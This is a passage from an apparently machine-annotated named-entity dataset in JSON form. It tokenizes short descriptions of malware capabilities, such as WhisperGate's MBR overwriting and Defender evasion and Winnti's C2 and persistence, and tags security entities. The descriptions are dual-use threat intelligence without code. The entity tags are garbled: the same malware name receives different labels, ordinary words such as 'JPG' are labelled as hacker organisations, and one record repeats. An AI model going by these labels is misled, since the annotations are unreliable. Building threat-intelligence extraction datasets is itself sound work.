"and", - "appending", - "random", - "extensions." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "deobfuscate", - "downloaded", - "files", - "stored", - "in", - "reverse", - "byte", - "order", - "and", - "decrypt", - "embedded", - "resources", - "using", - "multiple", - "XOR", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "download", - "and", - "execute", - "AdvancedRun.exe", - "to", - "disable", - "the", - "Windows", - "Defender", - "Theat", - "Protection", - "service", - "and", - "set", - "an", - "exclusion", - "path", - "for", - "the", - "C:\\", - "drive." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "overwrite", - "sectors", - "of", - "a", - "victim", - "host's", - "hard", - "drive", - "at", - "periodic", - "offsets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "overwrite", - "the", - "Master", - "Book", - "Record", - "(MBR)", - "on", - "victim", - "systems", - "with", - "a", - "malicious", - "16-bit", - "bootloader." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "Base64", - "encode", - "strings,", - "store", - "downloaded", - "files", - "in", - "reverse", - "byte", - "order,", - "and", - "use", - "the", - "Eazfuscator", - "tool", - "to", - "obfuscate", - "its", - "third", - "stage." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "delete", - "tools", - "from", - "a", - "compromised", - "host", - "after", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "locate", - "files", - "based", - "on", - "hardcoded", - "file", - "extensions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "download", - "additional", - "stages", - "of", - "malware", - "from", - "a", - "Discord", - "CDN", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "has", - "used", - "`InstallUtil.exe`", - "as", - "part", - "of", - "its", - "process", - "to", - "disable", - "Windows", - "Defender." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "has", - "been", - "disguised", - "as", - "a", - "JPG", - "extension", - "to", - "avoid", - "detection", - "as", - "a", - "malicious", - "PE", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "has", - "used", - "the", - "`ExitWindowsEx`", - "to", - "flush", - "file", - "buffers", - "to", - "disk", - "and", - "stop", - "running", - "processes", - "and", - "other", - "API", - "calls." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "enumerate", - "connected", - "remote", - "logical", - "drives." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "use", - "PowerShell", - "to", - "support", - "multiple", - "actions", - "including", - "execution", - "and", - "defense", - "evasion." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "has", - "the", - "ability", - "to", - "inject", - "its", - "fourth", - "stage", - "into", - "a", - "suspended", - "process", - "created", - "by", - "the", - "legitimate", - "Windows", - "utility", - "`InstallUtil.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate's", - "downloader", - "can", - "reverse", - "its", - "third", - "stage", - "file", - "bytes", - "and", - "reflectively", - "load", - "the", - "file", - "as", - "a", - ".NET", - "assembly." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "recognize", - "the", - "presence", - "of", - "monitoring", - "tools", - "on", - "a", - "target", - "system." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "download", - "and", - "execute", - "AdvancedRun.exe", - "via", - "`sc.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "stop", - "its", - "execution", - "when", - "it", - "recognizes", - "the", - "presence", - "of", - "certain", - "monitoring", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "has", - "the", - "ability", - "to", - "enumerate", - "fixed", - "logical", - "drives", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "shutdown", - "a", - "compromised", - "host", - "through", - "execution", - "of", - "`ExitWindowsEx`", - "with", - "the", - "`EXW_SHUTDOWN`", - "flag." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "pause", - "for", - "20", - "seconds", - "to", - "bypass", - "antivirus", - "solutions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "use", - "a", - "Visual", - "Basic", - "script", - "to", - "exclude", - "the", - "`C:\\`", - "drive", - "from", - "Windows", - "Defender." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "make", - "an", - "HTTPS", - "connection", - "to", - "download", - "additional", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "download", - "additional", - "payloads", - "hosted", - "on", - "a", - "Discord", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "use", - "`cmd.exe`", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wiarp", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "download", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Wiarp", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "inject", - "files", - "into", - "running", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wiarp", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "open", - "a", - "command", - "line", - "interface." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wiarp", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "create", - "a", - "service." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WinMM", - "is", - "usually", - "configured", - "with", - "primary", - "and", - "backup", - "domains", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WinMM", - "sets", - "a", - "WH_CBT", - "Windows", - "hook", - "to", - "search", - "for", - "and", - "capture", - "files", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WinMM", - "sets", - "a", - "WH_CBT", - "Windows", - "hook", - "to", - "collect", - "information", - "on", - "process", - "creation." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WinMM", - "collects", - "the", - "system", - "name,", - "OS", - "version", - "including", - "service", - "pack,", - "and", - "system", - "install", - "date", - "and", - "sends", - "the", - "information", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WinMM", - "uses", - "NetUser-GetInfo", - "to", - "identify", - "that", - "it", - "is", - "running", - "under", - "an", - "“Admin”", - "account", - "on", - "the", - "local", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WinMM", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "has", - "the", - "ability", - "to", - "use", - "the", - "macOS", - "built-in", - "zip", - "utility", - "to", - "archive", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "can", - "identify", - "and", - "add", - "files", - "that", - "possess", - "specific", - "file", - "extensions", - "to", - "an", - "array", - "for", - "archiving." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "has", - "the", - "ability", - "to", - "decrypt", - "strings", - "using", - "hard-coded", - "AES", - "keys." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "can", - "be", - "delivered", - "as", - "a", - "compressed,", - "encrypted,", - "and", - "encoded", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "has", - "the", - "ability", - "to", - "automatically", - "exfiltrate", - "files", - "using", - "the", - "macOS", - "built-in", - "utility", - "/usr/bin/curl." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "has", - "the", - "ability", - "to", - "receive", - "and", - "execute", - "a", - "self-delete", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "has", - "the", - "ability", - "to", - "enumerate", - "the", - "users", - "home", - "directory", - "and", - "the", - "path", - "to", - "its", - "own", - "application", - "bundle." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "can", - "instruct", - "the", - "OS", - "to", - "execute", - "an", - "application", - "without", - "a", - "dock", - "icon", - "or", - "menu." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "has", - "been", - "incompletely", - "signed", - "with", - "revoked", - "certificates." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "has", - "used", - "icons", - "mimicking", - "MS", - "Office", - "files", - "to", - "mask", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "can", - "invoke", - "Apple", - "APIs", - "<code>contentsOfDirectoryAtPath</code>,", - "<code>pathExtension</code>,", - "and", - "(string)", - "<code>compare</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "has", - "the", - "ability", - "to", - "generate", - "the", - "current", - "date", - "and", - "time." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "can", - "use", - "the", - "<code>open</code>", - "command", - "to", - "execute", - "an", - "application." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WindTail", - "has", - "the", - "ability", - "to", - "use", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "Credential", - "Editor", - "can", - "dump", - "credentials." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Winexe", - "installs", - "a", - "service", - "on", - "the", - "remote", - "system,", - "executes", - "the", - "command,", - "then", - "uninstalls", - "the", - "service." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Wingbird", - "side", - "loads", - "a", - "malicious", - "file,", - "sspisrv.dll,", - "in", - "part", - "of", - "a", - "spoofed", - "lssas.exe", - "service." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Wingbird", - "exploits", - "CVE-2016-4117", - "to", - "allow", - "an", - "executable", - "to", - "gain", - "escalated", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wingbird", - "deletes", - "its", - "payload", - "along", - "with", - "the", - "payload's", - "parent", - "process", - "after", - "it", - "finishes", - "copying", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wingbird", - "drops", - "a", - "malicious", - "file", - "(sspisrv.dll)", - "alongside", - "a", - "copy", - "of", - "lsass.exe,", - "which", - "is", - "used", - "to", - "register", - "a", - "service", - "that", - "loads", - "sspisrv.dll", - "as", - "a", - "driver.", - "The", - "payload", - "of", - "the", - "malicious", - "driver", - "(located", - "in", - "its", - "entry-point", - "function)", - "is", - "executed", - "when", - "loaded", - "by", - "lsass.exe", - "before", - "the", - "spoofed", - "service", - "becomes", - "unstable", - "and", - "crashes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wingbird", - "performs", - "multiple", - "process", - "injections", - "to", - "hijack", - "system", - "processes", - "and", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wingbird", - "checks", - "for", - "the", - "presence", - "of", - "Bitdefender", - "security", - "software." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wingbird", - "uses", - "services.exe", - "to", - "register", - "a", - "new", - "autostart", - "service", - "named", - "\"Audit", - "Service\"", - "using", - "a", - "copy", - "of", - "the", - "local", - "lsass.exe", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Wingbird", - "checks", - "the", - "victim", - "OS", - "version", - "after", - "executing", - "to", - "determine", - "where", - "to", - "drop", - "files", - "based", - "on", - "whether", - "the", - "victim", - "is", - "32-bit", - "or", - "64-bit." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wingbird", - "uses", - "services.exe", - "to", - "register", - "a", - "new", - "autostart", - "service", - "named", - "\"Audit", - "Service\"", - "using", - "a", - "copy", - "of", - "the", - "local", - "lsass.exe", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Linux", - "has", - "decoded", - "XOR", - "encoded", - "strings", - "holding", - "its", - "configuration", - "upon", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Linux", - "can", - "encode", - "its", - "configuration", - "file", - "with", - "single-byte", - "XOR", - "encoding." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Linux", - "has", - "the", - "ability", - "to", - "deploy", - "modules", - "directly", - "from", - "command", - "and", - "control", - "(C2)", - "servers,", - "possibly", - "for", - "remote", - "command", - "execution,", - "file", - "exfiltration,", - "and", - "socks5", - "proxying", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "B-Purp", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Linux", - "has", - "used", - "ICMP,", - "custom", - "TCP,", - "and", - "UDP", - "in", - "outbound", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Linux", - "has", - "used", - "a", - "modified", - "copy", - "of", - "the", - "open-source", - "userland", - "rootkit", - "Azazel,", - "named", - "libxselinux.so,", - "to", - "hide", - "the", - "malware's", - "operations", - "and", - "network", - "activity." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Linux", - "has", - "used", - "a", - "custom", - "TCP", - "protocol", - "with", - "four-byte", - "XOR", - "for", - "command", - "and", - "control", - "(C2)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Linux", - "has", - "used", - "a", - "passive", - "listener,", - "capable", - "of", - "identifying", - "a", - "specific", - "magic", - "value", - "before", - "executing", - "tasking,", - "as", - "a", - "secondary", - "command", - "and", - "control", - "(C2)", - "mechanism." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Linux", - "has", - "used", - "HTTP", - "in", - "outbound", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "can", - "use", - "a", - "variant", - "of", - "the", - "sysprep", - "UAC", - "bypass." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Winnti", - "for", - "Windows", - "dropper", - "can", - "decrypt", - "and", - "decompresses", - "a", - "data", - "blob." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "has", - "the", - "ability", - "to", - "encrypt", - "and", - "compress", - "its", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Winnti", - "for", - "Windows", - "dropper", - "component", - "can", - "verify", - "the", - "existence", - "of", - "a", - "single", - "command", - "line", - "parameter", - "and", - "either", - "terminate", - "if", - "it", - "is", - "not", - "found", - "or", - "later", - "use", - "it", - "as", - "a", - "decryption", - "key." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "B-SecTeam", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Winnti", - "for", - "Windows", - "HTTP/S", - "C2", - "mode", - "can", - "make", - "use", - "of", - "an", - "external", - "proxy." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "can", - "delete", - "the", - "DLLs", - "for", - "its", - "various", - "components", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "can", - "check", - "for", - "the", - "presence", - "of", - "specific", - "files", - "prior", - "to", - "moving", - "to", - "the", - "next", - "phase", - "of", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Winnti", - "for", - "Windows", - "dropper", - "can", - "place", - "malicious", - "payloads", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "B-SecTeam", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Winnti", - "for", - "Windows", - "HTTP/S", - "C2", - "mode", - "can", - "make", - "use", - "of", - "a", - "local", - "proxy." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Winnti", - "for", - "Windows", - "implant", - "file", - "was", - "named", - "ASPNET_FILTER.DLL,", - "mimicking", - "the", - "legitimate", - "ASP.NET", - "ISAPI", - "filter", - "DLL", - "with", - "the", - "same", - "name." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "can", - "use", - "Native", - "API", - "to", - "create", - "a", - "new", - "process", - "and", - "to", - "start", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "can", - "communicate", - "using", - "custom", - "TCP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "can", - "check", - "if", - "the", - "explorer.exe", - "process", - "is", - "responsible", - "for", - "calling", - "its", - "install", - "function." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "can", - "add", - "a", - "service", - "named", - "<code>wind0ws</code>", - "to", - "the", - "Registry", - "to", - "achieve", - "persistence", - "after", - "reboot." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Winnti", - "for", - "Windows", - "installer", - "loads", - "a", - "DLL", - "using", - "rundll32." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "can", - "run", - "as", - "a", - "service", - "using", - "svchost.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "can", - "XOR", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "can", - "determine", - "if", - "the", - "OS", - "on", - "a", - "compromised", - "host", - "is", - "newer", - "than", - "Windows", - "XP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "for", - "Windows", - "can", - "set", - "the", - "timestamps", - "for", - "its", - "worker", - "and", - "service", - "components", - "to", - "match", - "that", - "of", - "cmd.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", 